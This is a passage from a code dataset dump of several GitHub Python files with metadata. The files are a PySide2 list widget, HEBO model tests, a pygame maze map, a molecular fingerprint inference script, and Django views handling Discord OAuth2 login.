01 Matrix/main2.py", "file_name": "main2.py", "file_ext": "py", "file_size_in_byte": 1093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "math.inf", "line_number": 24, "usage_type": "attribute"}, {"api_name": "math.inf", "line_number": 25, "usage_type": "attribute"}, {"api_name": "math.inf", "line_number": 31, "usage_type": "attribute"}, {"api_name": "math.inf", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "71772273084", "text": "from PySide2.QtCore import Qt\nfrom PySide2.QtGui import QMouseEvent\nfrom PySide2.QtWidgets import QListWidget, QAbstractItemView\n\nfrom component.scroll.smooth_scroll_bar import SmoothScrollBar\nfrom qt_owner import QtOwner\nfrom task.qt_task import QtTaskBase\n\n\nclass BaseListWidget(QListWidget, QtTaskBase):\n def __init__(self, parent):\n QListWidget.__init__(self, parent)\n QtTaskBase.__init__(self)\n self.page = 1\n self.pages = 1\n # self.verticalScrollBar().valueChanged.connect(self.OnMove)\n self.isLoadingPage = False\n self.LoadCallBack = None\n self.OpenBack = None\n self.LikeBack = None\n self.KillBack = None\n self.parentId = -1\n\n self.vScrollBar = SmoothScrollBar()\n self.vScrollBar.setOrientation(Qt.Orientation.Vertical)\n self.setVerticalScrollBar(self.vScrollBar)\n\n self.vScrollBar.MoveEvent.connect(self.OnActionTriggered)\n\n # QScroller.grabGesture(self.viewport(), QScroller.LeftMouseButtonGesture)\n self.setVerticalScrollMode(QAbstractItemView.ScrollMode.ScrollPerPixel)\n self.verticalScrollBar().setSingleStep(30)\n\n self.hScrollBar = SmoothScrollBar()\n self.hScrollBar.setOrientation(Qt.Orientation.Horizontal)\n self.setHorizontalScrollBar(self.hScrollBar)\n self.setHorizontalScrollMode(QAbstractItemView.ScrollMode.ScrollPerPixel)\n self.horizontalScrollBar().setSingleStep(30)\n # self.timer = QTimer()\n # self.timer.setInterval(1000)\n # self.timer.timeout.connect(self.TimeOut)\n\n self.wheelStatus = True\n self.lastClick = 0\n self.lastIndex = -1\n self.doubleClickType = 0\n self.wheelMode = 0\n\n def ClearWheelEvent(self):\n pass\n # self.vScrollBar.stop()\n\n def SetWheelStatus(self, status):\n self.wheelStatus = status\n\n def wheelEvent(self, arg__1) -> None:\n if not self.wheelStatus:\n return\n if self.wheelMode == 0:\n self.vScrollBar.ScrollValue(-arg__1.angleDelta().y())\n else:\n self.hScrollBar.ScrollValue(-arg__1.angleDelta().y())\n\n def OnActionTriggered(self):\n if self.isLoadingPage:\n return\n if self.page >= self.pages:\n return\n if self.verticalScrollBar().sliderPosition() == self.verticalScrollBar().maximum():\n self.ClearWheelEvent()\n self.isLoadingPage = True\n if self.LoadCallBack:\n self.LoadCallBack()\n\n def UpdatePage(self, page, pages):\n self.page = page\n self.pages = pages\n\n def UpdateState(self, isLoading=False):\n self.isLoadingPage = isLoading\n\n def clear(self) -> None:\n QListWidget.clear(self)\n\n # 防止异步加载时,信息错乱\n self.ClearTask()\n self.vScrollBar.ResetValue(0)\n\n def mousePressEvent(self, event: QMouseEvent):\n if event.button() == Qt.ForwardButton:\n # QtOwner().SwitchWidgetNext()\n event.ignore()\n elif event.button() == Qt.BackButton:\n event.ignore()\n # QtOwner().SwitchWidgetLast()\n return QListWidget.mousePressEvent(self, event)", "repo_name": "orgTestCodacy11KRepos110MB/repo-5768-ehentai-qt", "sub_path": "src/component/list/base_list_widget.py", "file_name": "base_list_widget.py", "file_ext": "py", 
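# A minimal usage sketch for the BaseListWidget above -- an illustration only, assuming
# the repo's component/ and task/ packages are importable; it is not code from the
# original project.
import sys
from PySide2.QtWidgets import QApplication

if __name__ == "__main__":
    app = QApplication(sys.argv)
    lst = BaseListWidget(None)
    lst.addItems([f"item {i}" for i in range(200)])
    lst.UpdatePage(1, 10)                               # pretend more pages exist
    lst.LoadCallBack = lambda: print("load next page")  # fired on scroll to bottom
    lst.show()
    sys.exit(app.exec_())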
"file_size_in_byte": 3210, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PySide2.QtWidgets.QListWidget", "line_number": 10, "usage_type": "name"}, {"api_name": "task.qt_task.QtTaskBase", "line_number": 10, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QListWidget.__init__", "line_number": 12, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QListWidget", "line_number": 12, "usage_type": "name"}, {"api_name": "task.qt_task.QtTaskBase.__init__", "line_number": 13, "usage_type": "call"}, {"api_name": "task.qt_task.QtTaskBase", "line_number": 13, "usage_type": "name"}, {"api_name": "component.scroll.smooth_scroll_bar.SmoothScrollBar", "line_number": 24, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.Orientation", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 25, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QAbstractItemView.ScrollMode", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAbstractItemView", "line_number": 31, "usage_type": "name"}, {"api_name": "component.scroll.smooth_scroll_bar.SmoothScrollBar", "line_number": 34, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.Orientation", "line_number": 35, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 35, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QAbstractItemView.ScrollMode", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAbstractItemView", "line_number": 37, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QListWidget.clear", "line_number": 83, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QListWidget", "line_number": 83, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QMouseEvent", "line_number": 89, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.ForwardButton", "line_number": 90, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 90, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.BackButton", "line_number": 93, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 93, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QListWidget.mousePressEvent", "line_number": 96, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QListWidget", "line_number": 96, "usage_type": "name"}]} +{"seq_id": "3847169021", "text": "# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.\r\n\r\n# This program is free software; you can redistribute it and/or modify it under\r\n# the terms of the MIT license.\r\n\r\n# This program is distributed in the hope that it will be useful, but WITHOUT ANY\r\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\r\n# PARTICULAR PURPOSE. 
See the MIT License for more details.\r\n\r\nimport sys, os\r\nsys.path.append(os.path.abspath(os.path.dirname(__file__)) + '/../')\r\n\r\nimport pytest\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom hebo.models.nn.fe_deep_ensemble import FeNet, FeDeepEnsemble\r\nfrom hebo.models.nn.gumbel_linear import GumbelSelectionLayer, GumbelNet, GumbelDeepEnsemble\r\nfrom .util import check_prediction\r\n\r\ndef test_fe_net():\r\n net = FeNet(2, 0, 1)\r\n x = torch.randn(10, 2)\r\n y = net(x, None)\r\n assert torch.isfinite(y).all()\r\n\r\n t = torch.rand(())\r\n net = FeNet(2, 0, 1, temperature = t)\r\n assert net.feature_select.temperature == t\r\n\r\n@pytest.mark.parametrize('fe_layer', ['concrete', 'hard_concrete', 'stg'])\r\ndef test_fe_ensemble(fe_layer):\r\n x = torch.randn(300, 10)\r\n y = x[:, 0].view(-1, 1)\r\n model = FeDeepEnsemble(x.shape[1], 0, 1, \r\n output_noise = False,\r\n num_ensembles = 1,\r\n num_processes = 1,\r\n num_epochs = 1, \r\n fe_layer = fe_layer, \r\n )\r\n model.fit(x, None, y)\r\n with torch.no_grad():\r\n py, ps2 = model.predict(x, None)\r\n check_prediction(y, py, ps2)\r\n\r\n\r\ndef test_gumbel_linear():\r\n torch.manual_seed(42)\r\n x = torch.randn(100, 5)\r\n with torch.no_grad():\r\n layer = GumbelSelectionLayer(5, 1, temperature = 1e-6)\r\n res = x - layer(x)\r\n assert res.var(axis = 0).min() < 1e-3\r\n \r\n layer.temperature = 1e6\r\n res = x - layer(x)\r\n assert res.var(axis = 0).min() > 1e-1\r\n\r\ndef test_gumbel_net():\r\n net = GumbelNet(2, 0, 1, reduced_dim = 1)\r\n x = torch.randn(10, 2)\r\n y = net(x, None)\r\n\r\ndef test_gumbel_ensemble():\r\n x = torch.randn(300, 10)\r\n y = x[:, 0].view(-1, 1)\r\n model = GumbelDeepEnsemble(x.shape[1], 0, 1, \r\n reduced_dim = 2,\r\n num_epochs = 1)\r\n model.fit(x, None, y)\r\n assert model.models[0].reduced_dim == 2\r\n with torch.no_grad():\r\n py, ps2 = model.predict(x, None)\r\n check_prediction(y, py, ps2)\r\n", "repo_name": "huawei-noah/HEBO", "sub_path": "HEBO/test/test_concrete.py", "file_name": "test_concrete.py", "file_ext": "py", "file_size_in_byte": 2536, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2286, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "hebo.models.nn.fe_deep_ensemble.FeNet", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.isfinite", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 28, "usage_type": "call"}, {"api_name": "hebo.models.nn.fe_deep_ensemble.FeNet", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 34, "usage_type": "call"}, {"api_name": "hebo.models.nn.fe_deep_ensemble.FeDeepEnsemble", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 44, "usage_type": "call"}, {"api_name": "util.check_prediction", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 50, "usage_type": 
"call"}, {"api_name": "torch.randn", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 52, "usage_type": "call"}, {"api_name": "hebo.models.nn.gumbel_linear.GumbelSelectionLayer", "line_number": 53, "usage_type": "call"}, {"api_name": "hebo.models.nn.gumbel_linear.GumbelNet", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 67, "usage_type": "call"}, {"api_name": "hebo.models.nn.gumbel_linear.GumbelDeepEnsemble", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 74, "usage_type": "call"}, {"api_name": "util.check_prediction", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "43055107909", "text": "import pygame\nimport kit\nimport random\n\ndef direction_to_wall(direction):\n\tif (direction[0] == 0):\n\t\tif (direction[1] > 0):\n\t\t\t# down\n\t\t\treturn 1\n\t\telse:\n\t\t\t# up\n\t\t\treturn 4\n\telif (direction[0] > 0):\n\t\t# right\n\t\treturn 2\n\telse:\n\t\t# left\n\t\treturn 8\n\nclass KitInMap(object):\n\tdef __init__(self, kit, grid_position):\n\t\tself.kit = kit\n\t\tself.grid_position = grid_position\n\nclass GameMap(object):\n\tdef __init__(self, position, size, color_bk, grid_size, grids, width_wall, color_wall):\n\t\tself.position = position\n\t\tself.size = size\n\t\tself.color = color_bk\n\t\tself.grid_size = grid_size\n\t\tself.grids = grids\n\t\tself.color_wall = color_wall\n\t\tself.width_wall = width_wall\n\t\tself.map_size = ( int(size[0]/grid_size[0]), int(size[1]/grid_size[1]) ) # X*Y grids in this map\n\n\tdef grid_position(self, map_position):\n\t\treturn ( self.position[0] + int(map_position[0]*self.grid_size[0]),\n\t\t self.position[1] + int(map_position[1]*self.grid_size[1]) )\n\n\tdef grid_center(self, map_position):\n\t\treturn ( self.position[0] + int((map_position[0]+0.5)*self.grid_size[0]),\n\t\t self.position[1] + int((map_position[1]+0.5)*self.grid_size[1]) ) \n\n\tdef detect_grid(self, position):\n\t\treturn (int((position[0]-self.position[0])/self.grid_size[0]),\n\t\t int((position[1]-self.position[1])/self.grid_size[1])) \n \n\t# Kits Contorl\n\tdef kit_reset(self, kit_max, kit_freq):\n\t\tself.kit_roster = [kit.KitSpeedUp, kit.KitReverse] # defined here currently. 
may be an argument if necessary\n\t\tself.kit_max = kit_max\n\t\tself.kit_freq = kit_freq\n\t\tself.kit_freq_count = 0\n\t\tself.kit_list = []\n\n\tdef kit_gen(self):\n\t\t# cannot generate kit in a closed grid\n\t\tmap_position = (random.randint(0, self.map_size[0]-1), random.randint(0, self.map_size[1]-1))\n\t\twhile ( self.grids[ map_position[0]+map_position[1]*self.map_size[0] ] == 15 ):\n\t\t\tmap_position = (random.randint(0, self.map_size[0]-1), random.randint(0, self.map_size[1]-1))\n\n\t\tself.kit_list.append( KitInMap( random.choice(self.kit_roster)(), map_position ) )\n\n\tdef kit_progress(self):\n\t\tif ( len(self.kit_list) < self.kit_max and self.kit_freq_count == self.kit_freq ):\n\t\t\tself.kit_gen()\n\t\t\tself.kit_freq_count = 0\n\t\telse:\n\t\t\tself.kit_freq_count = self.kit_freq_count + 1\n\n\t# Drawing\n\tdef draw_kit(self, sur):\n\t\tfor kitinmap in self.kit_list:\n\t\t\tgrid_center = self.grid_center(kitinmap.grid_position)\n\t\t\tsur.blit( kitinmap.kit.sur_icon, (grid_center[0]-kitinmap.kit.size_icon[0]/2, grid_center[1]-kitinmap.kit.size_icon[1]/2) )\n\n\tdef draw_grid(self, sur, grid_position, grid_size, grid):\n\t\t### draw wall\n\t\t# down side 0001\n\t\tif (grid & 1 == 1):\n\t\t\tpygame.draw.rect(sur, self.color_wall, \n\t\t\t\t(grid_position[0], grid_position[1]+grid_size[1]-self.width_wall, self.grid_size[0], self.width_wall))\n\t\t# right side 0010\n\t\tif (grid & 2 == 2):\n\t\t\tpygame.draw.rect(sur, self.color_wall, \n\t\t\t\t(grid_position[0]+grid_size[0]-self.width_wall, grid_position[1], self.width_wall, self.grid_size[1]))\n\t\t# up side 0100\n\t\tif (grid & 4 == 4):\n\t\t\tpygame.draw.rect(sur, self.color_wall, \n\t\t\t\t(grid_position[0], grid_position[1], self.grid_size[0], self.width_wall))\n\t\t# left side 1000\n\t\tif (grid & 8 == 8):\n\t\t\tpygame.draw.rect(sur, self.color_wall, \n\t\t\t\t(grid_position[0], grid_position[1], self.width_wall, self.grid_size[1]))\n\n\tdef draw(self, sur):\n\t\tpygame.draw.rect( sur, self.color, self.position+self.size)\n\t\tfor i in range(len(self.grids)):\n\t\t\t# grid center for debugging\n\t\t\t# pygame.draw.circle(sur, self.color_wall, self.grid_center( (int(i%self.map_size[0]), int(i/self.map_size[0])) ), 2) \n\t\t\tself.draw_grid(sur, \n\t\t\t\t( int(i%self.map_size[0])*self.grid_size[0]+self.position[0], int(i/self.map_size[0])*self.grid_size[1]+self.position[1] ), \n\t\t\t\tself.grid_size, \n\t\t\t\t self.grids[i])\n\t\tself.draw_kit( sur )\n", "repo_name": "nyphoon/BreakBack", "sub_path": "game_map.py", "file_name": "game_map.py", "file_ext": "py", "file_size_in_byte": 3711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "kit.KitSpeedUp", "line_number": 50, "usage_type": "attribute"}, {"api_name": "kit.KitReverse", "line_number": 50, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 58, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 60, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 89, "usage_type": "attribute"}, 
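# A worked example of the wall bitmask that draw_grid above decodes
# (1 = down, 2 = right, 4 = up, 8 = left); the sample value is illustrative.
grid = 9  # 0b1001 -> a cell with a down wall and a left wall
walls = [name for bit, name in ((1, "down"), (2, "right"), (4, "up"), (8, "left")) if grid & bit]
print(walls)       # ['down', 'left']
print(grid == 15)  # False; 15 (0b1111) is the fully closed cell that kit_gen skips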
{"api_name": "pygame.draw.rect", "line_number": 93, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 97, "usage_type": "attribute"}]} +{"seq_id": "577804973", "text": "\"\"\"\nRuibo test inference. \nloading the model and convering mols.\n\nThe data loader returns return ((gs_charge, atom_type, pos, nums_atoms), fps), idxs\nall of them are lists\n\n原始数据包括 array, fp, idx\narray 可以从 from_mol_to_array() 得\n转换写在 ZINCH5Dataloader._get_batch\n把 array 转化成 (gs_charge, atom_type, pos, nums_atoms)\n\ninfer() 输入的array 包括 gs_charge, atom_type, pos, nums_atoms\n需要 from_mol_to_array() -> 转换 -> (gs_charge, atom_type, pos, nums_atoms) tuple 格式\n\"\"\"\n\nimport torch\nimport pandas as pd\nimport numpy as np\nfrom rdkit.Chem import MolFromSmiles, AddHs, AllChem, DataStructs\nfrom model.networks import ForceFieldCapsNet\nfrom data.force_field import from_mol_to_array\n\nfrom torch.utils.data import Dataset, DataLoader\n\n#%%\nclass ChEMBLE_Data(Dataset):\n def __init__(self, batch_array, batch_fp, batch_idx):\n \"\"\"\n Parameters\n ----------\n batch_array : iterable\n DESCRIPTION.\n batch_fp : iterable\n DESCRIPTION.\n batch_idx : iterable\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n \"\"\"\n idxs, fps = [], []\n nums_atoms, gs_charge, atom_type, pos = [], [], [], []\n for array, fp, idx in zip(batch_array, batch_fp, batch_idx): # see Dataset __getitem__\n # array = self.restore_flat_array(array) # 从from_mol_to_array() 得来已经是原格式了\n nums_atoms.append(len(array[0]))\n gs_charge += array[0]\n atom_type += array[1]\n pos += array[2]\n fps.append(fp.tolist()) # array to list\n # idxs.append(int(idx)) # np.int to int # 现在用 str index\n idxs.append(idx)\n self.data = ( ((gs_charge, atom_type, pos, nums_atoms), fps), idxs )\n\n\n def __len__(self):\n return len(self.fp)\n \n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n # @staticmethod\n # def restore_flat_array(fa):\n # fa = fa.reshape(-1, 5)\n # return (fa[:, 0].tolist(),\n # fa[:, 1].astype('int').tolist(),\n # fa[:, 2:].tolist())\n \n def get_array(self):\n return self.data[0][0]\n\n#%%\n\ndef convert_df_to_array_batch(df: pd.DataFrame) -> tuple:\n # 可能不需要一批一批处理,应该是单个的,但一批的可以用,不改了。\n array_list = []\n for idx, each_row in df.iterrows():\n mol = MolFromSmiles(each_row[\"Smiles\"])\n molh = AddHs(mol)\n AllChem.EmbedMolecule(molh)\n arr = from_mol_to_array(molh)\n array_list.append(arr)\n idx_list = df.index.to_list()\n\n nums_atoms, gs_charge, atom_type, pos = [], [], [], []\n for array, idx in zip(array_list, idx_list): # see Dataset __getitem__\n # array = self.restore_flat_array(array) # 从from_mol_to_array() 得来已经是原格式了\n nums_atoms.append(len(array[0]))\n gs_charge += array[0]\n atom_type += array[1]\n pos += array[2]\n return (gs_charge, atom_type, pos, nums_atoms), arr\n\n#%%\nif __name__ == \"__main__\":\n \n df = pd.read_table(\"G:/topological_regression/data/ChEMBL/test_data.txt\", index_col=0).iloc[:2]\n # list of field arrays fps\n array_list = []\n fp_list = np.zeros((len(df), 1024))\n i = 0\n for idx, each_row in df.iterrows():\n mol = MolFromSmiles(each_row[\"Smiles\"])\n molh = AddHs(mol)\n AllChem.EmbedMolecule(molh)\n arr1 = from_mol_to_array(molh)\n array_list.append(arr1)\n\n fp2 = AllChem.GetMorganFingerprintAsBitVect(molh, 2, nBits=1024)\n DataStructs.ConvertToNumpyArray(fp2, fp_list[i])\n\n idx_list = df.index.to_list()\n dataset = 
ChEMBLE_Data(array_list, fp_list, idx_list)\n array_to_infer = dataset.get_array()\n\n\n array_to_infer2, arr2 = convert_df_to_array_batch(df)\n\n #%%\n test_list = []\n for ii in range(10):\n molh = AddHs(mol)\n AllChem.EmbedMolecule(molh) # 每次All Chem embed 之后位置都不一样\n arr_test = from_mol_to_array(molh)[2]\n test_list.append(arr_test)\n raise\n #%%\n model = ForceFieldCapsNet(num_digit_caps=1024)\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3) # change to whatever optimizer was used\n\n checkpoint = torch.load(\"tf3p_trained_models/TF3P-ECFP4-b1024-GS50-W5.pt\")\n model.load_state_dict(checkpoint)\n\n\n embed = model.infer(array_to_infer)\n \n\n embed1 = model.infer(array_to_infer)\n embed2 = model.infer(array_to_infer2)\n\n", "repo_name": "Ribosome25/TF3P", "sub_path": "inference_test.py", "file_name": "inference_test.py", "file_ext": "py", "file_size_in_byte": 4546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.is_tensor", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 77, "usage_type": "attribute"}, {"api_name": "rdkit.Chem.MolFromSmiles", "line_number": 81, "usage_type": "call"}, {"api_name": "rdkit.Chem.AddHs", "line_number": 82, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem.EmbedMolecule", "line_number": 83, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 83, "usage_type": "name"}, {"api_name": "data.force_field.from_mol_to_array", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "rdkit.Chem.MolFromSmiles", "line_number": 106, "usage_type": "call"}, {"api_name": "rdkit.Chem.AddHs", "line_number": 107, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem.EmbedMolecule", "line_number": 108, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 108, "usage_type": "name"}, {"api_name": "data.force_field.from_mol_to_array", "line_number": 109, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem.GetMorganFingerprintAsBitVect", "line_number": 112, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 112, "usage_type": "name"}, {"api_name": "rdkit.Chem.DataStructs.ConvertToNumpyArray", "line_number": 113, "usage_type": "call"}, {"api_name": "rdkit.Chem.DataStructs", "line_number": 113, "usage_type": "name"}, {"api_name": "rdkit.Chem.AddHs", "line_number": 125, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem.EmbedMolecule", "line_number": 126, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 126, "usage_type": "name"}, {"api_name": "data.force_field.from_mol_to_array", "line_number": 127, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 131, "usage_type": "name"}, {"api_name": "model.networks.ForceFieldCapsNet", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 132, "usage_type": "attribute"}, {"api_name": "model.networks.parameters", "line_number": 132, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 134, "usage_type": "call"}, {"api_name": "model.networks.load_state_dict", "line_number": 135, 
"usage_type": "call"}, {"api_name": "model.networks", "line_number": 135, "usage_type": "name"}, {"api_name": "model.networks.infer", "line_number": 138, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 138, "usage_type": "name"}, {"api_name": "model.networks.infer", "line_number": 141, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 141, "usage_type": "name"}, {"api_name": "model.networks.infer", "line_number": 142, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 142, "usage_type": "name"}]} +{"seq_id": "11219921017", "text": "import os\nimport asyncio\nimport httpx\nfrom dotenv import load_dotenv\nfrom datetime import datetime, timedelta\n\nfrom django.shortcuts import render, redirect, HttpResponse\n\nfrom django_utils import get_session_data, set_session, delete_session\n\nload_dotenv('./.env')\n\nCLIENT_ID = os.getenv('CLIENT_ID')\nCLIENT_SECRET = os.getenv('CLIENT_SECRET')\nAPI_ENDPOINT = 'https://discord.com/api'\nTOKEN_ENDPOINT = 'https://discord.com/api/oauth2/token'\nUSER_ENDPOINT = 'https://discord.com/api/users/@me'\nREDIRECT_URI = 'http://127.0.0.1:8000/callback'\nSCOPE = 'identify%20email%20guilds'\nOAUTH2_URL = f'https://discord.com/api/oauth2/authorize?client_id={CLIENT_ID}&redirect_uri=http%3A%2F%2F127.0.0.1%3A8000%2Fcallback&response_type=code&scope=identify%20email%20guilds'\n\n\ndef main(request):\n request.session.set_test_cookie()\n return redirect('home/')\n\n@sync_to_async\ndef manage_test_cookie(request):\n if request.session.test_cookie_worked():\n # try:\n # request.session.delete_test_cookie()\n # except:\n # pass\n return True\n else:\n return False\n\nasync def index(request):\n if await manage_test_cookie(request) is False:\n return redirect('/cookiedisabled/')\n\n context = {\n 'logged_in': False,\n 'avatar': None\n }\n\n _access_token = await get_session_data(request, 'ACCESS_TOKEN')\n if _access_token:\n _expires_on = await get_session_data(request, 'EXPIRES_ON')\n _expires_on = datetime.strptime(_expires_on, '%Y-%m-%d %H:%M:%S.%f') if _expires_on else None\n\n if _expires_on:\n if (_expires_on - datetime.utcnow()).seconds > 43200:\n context['logged_in'] = True\n headers = {\"Authorization\": f\"Bearer {_access_token}\"}\n resp = httpx.get(USER_ENDPOINT, headers=headers)\n resp.raise_for_status()\n data = resp.json()\n\n if not data['avatar']:\n context['avatar'] = f'https://cdm.discordapp.com/embed/avatars/{int(data[\"discriminator\"]) % 5}.png'\n elif str(data['avatar']).startswith('a_'):\n context['avatar'] = f'https://cdn.discordapp.com/avatars/{data[\"id\"]}/{data[\"avatar\"]}.gif'\n else:\n context['avatar'] = f'https://cdn.discordapp.com/avatars/{data[\"id\"]}/{data[\"avatar\"]}.png'\n\n return render(request, 'home/index.html', context)\n\nasync def login(request):\n if await manage_test_cookie(request) is False:\n return redirect('/cookiedisabled/')\n\n _access_token = await get_session_data(request, 'ACCESS_TOKEN')\n if _access_token:\n _expires_on = await get_session_data(request, 'EXPIRES_ON')\n _expires_on = datetime.strptime(_expires_on, '%Y-%m-%d %H:%M:%S.%f') if _expires_on else None\n\n if _expires_on:\n if (_expires_on - datetime.utcnow()).seconds > 43200:\n return redirect('/dashboard/')\n\n _refresh_token = await get_session_data(request, 'REFRESH_TOKEN')\n if _refresh_token:\n data = {\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'grant_type': 'refresh_token',\n 'refresh_token':_refresh_token\n }\n resp = httpx.post(TOKEN_ENDPOINT, data=data)\n 
resp.raise_for_status()\n _resp_content = resp.json()\n\n await set_session(request, 'ACCESS_TOKEN', _resp_content['access_token'])\n await set_session(request, 'EXPIRES_ON', datetime.utcnow() + timedelta(seconds=_resp_content['expires_in']))\n\n return redirect('/dashboard/')\n\n return redirect(OAUTH2_URL)\n\nasync def callback(request):\n _code = request.GET.get('code')\n data = {\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'grant_type': 'authorization_code',\n 'code': _code,\n 'redirect_uri': REDIRECT_URI\n }\n resp = httpx.post(TOKEN_ENDPOINT, data=data)\n resp.raise_for_status()\n _resp_content = resp.json()\n\n _expiry_time = datetime.utcnow() + timedelta(seconds=_resp_content['expires_in'])\n\n await set_session(request, 'ACCESS_TOKEN', _resp_content['access_token'])\n await set_session(request, 'EXPIRES_ON', _expiry_time.strftime('%Y-%m-%d %H:%M:%S.%f'))\n\n return redirect('/dashboard/')\n\nasync def logout(request):\n await delete_session(request, 'ACCESS_TOKEN')\n await delete_session(request, 'EXPIRES_ON')\n return redirect('/')\n\ndef noscript(request):\n return render(request, 'utils/noscript.html')\n\ndef cookiedisabled(request):\n return render(request, 'utils/cookiedisabled.html')", "repo_name": "AkshuAgarwal/Aperture-Dashboard", "sub_path": "home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 40, "usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 47, "usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", 